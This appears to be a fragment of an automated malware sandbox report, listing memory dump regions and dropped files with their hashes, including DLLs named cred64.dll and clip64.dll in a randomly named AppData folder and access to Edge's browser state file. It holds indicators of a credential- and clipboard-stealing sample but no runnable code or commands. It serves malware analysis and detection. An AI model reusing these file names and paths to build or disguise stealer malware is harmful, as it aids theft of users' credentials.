MD5 ec6aae2bb7d8781226ea61adca8f0586
SHA1 d82b3bad240f263c1b887c7c0cc4c2ff0e86dfe3
SHA256 b02fffaba9e664ff7840c82b102d6851ec0bb148cec462cef40999545309e599
SHA512 aa62a8cd02a03e4f462f76ae6ff2e43849052ce77cca3a2ccf593f6669425830d0910afac3cf2c46dd385454a6fb3b4bd604ae13b9586087d6f22de644f9dfc7

memory/4792-475-0x0000000003050000-0x000000000393B000-memory.dmp

memory/4632-478-0x0000000000400000-0x0000000000627000-memory.dmp

memory/1004-454-0x0000000000880000-0x0000000000980000-memory.dmp

memory/4792-481-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/5156-482-0x0000000000400000-0x0000000000413000-memory.dmp

memory/4792-483-0x0000000002C40000-0x0000000003047000-memory.dmp

memory/5868-480-0x0000000073E80000-0x0000000074630000-memory.dmp

memory/4792-485-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/5124-495-0x0000000000390000-0x0000000000A7F000-memory.dmp

memory/3340-497-0x0000000006FF0000-0x0000000007006000-memory.dmp

memory/4428-499-0x0000000000400000-0x0000000000409000-memory.dmp

memory/5700-502-0x00007FF74B340000-0x00007FF74B8E1000-memory.dmp

memory/5384-504-0x00007FF965C10000-0x00007FF9666D1000-memory.dmp

memory/5188-509-0x0000000000400000-0x00000000004CF000-memory.dmp

memory/5384-510-0x000000001B430000-0x000000001B440000-memory.dmp

memory/5188-513-0x0000000000730000-0x0000000000731000-memory.dmp

memory/6004-514-0x0000000073E80000-0x0000000074630000-memory.dmp

memory/6004-515-0x0000000000F60000-0x0000000001340000-memory.dmp

memory/6004-516-0x0000000005BA0000-0x0000000005C3C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 e113c6496743bac2e000912f13ca61fe
SHA1 4204d7e540a27e407b95d23b601fa32fe577d9c0
SHA256 9ba085f1c6729e5bf36d3e1ca3e81ffe54bd88389fb9cd3b142e6e9c481ebafc
SHA512 e6680c7fc1f4788028163d986b5910d289ad3bf7d5adbc7e63501512de3ddda126d068b38a5fef8a8fd0b148257a832305c7fec4a19e3e17e90e577a4c1f5330

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll

MD5 a5b509a3fb95cc3c8d89cd39fc2a30fb
SHA1 5aff4266a9c0f2af440f28aa865cebc5ddb9cd5c
SHA256 5f3c80056c7b1104c15d6fee49dac07e665c6ffd0795ad486803641ed619c529
SHA512 3cc58d989c461a04f29acbfe03ed05f970b3b3e97e6819962fc5c853f55bce7f7aba0544a712e3a45ee52ab31943c898f6b3684d755b590e3e961ae5ecd1edb9

memory/2780-532-0x0000000004A10000-0x0000000004A46000-memory.dmp

memory/2780-533-0x0000000073E80000-0x0000000074630000-memory.dmp

memory/2780-535-0x00000000051C0000-0x00000000057E8000-memory.dmp

memory/5384-536-0x00007FF965C10000-0x00007FF9666D1000-memory.dmp

memory/2780-534-0x0000000004B80000-0x0000000004B90000-memory.dmp

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

MD5 e913b0d252d36f7c9b71268df4f634fb
SHA1 5ac70d8793712bcd8ede477071146bbb42d3f018
SHA256 4cf5b584cf79ac523f645807a65bc153fbeaa564c0e1acb4dac9004fc9d038da
SHA512 3ea08f0897c1b7b5859961351eef59840bbf319a6ad7ebe1c9e1b5e2ce25588d7b1a37fd6c5417653521fc73f1f42eb043d0ee6fcd645aa92b8f305d726273b4

memory/2780-543-0x0000000004EE0000-0x0000000004F02000-memory.dmp

memory/4792-546-0x0000000003050000-0x000000000393B000-memory.dmp

memory/4792-547-0x0000000000400000-0x0000000000D1B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ayv0kgxb.ldh.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82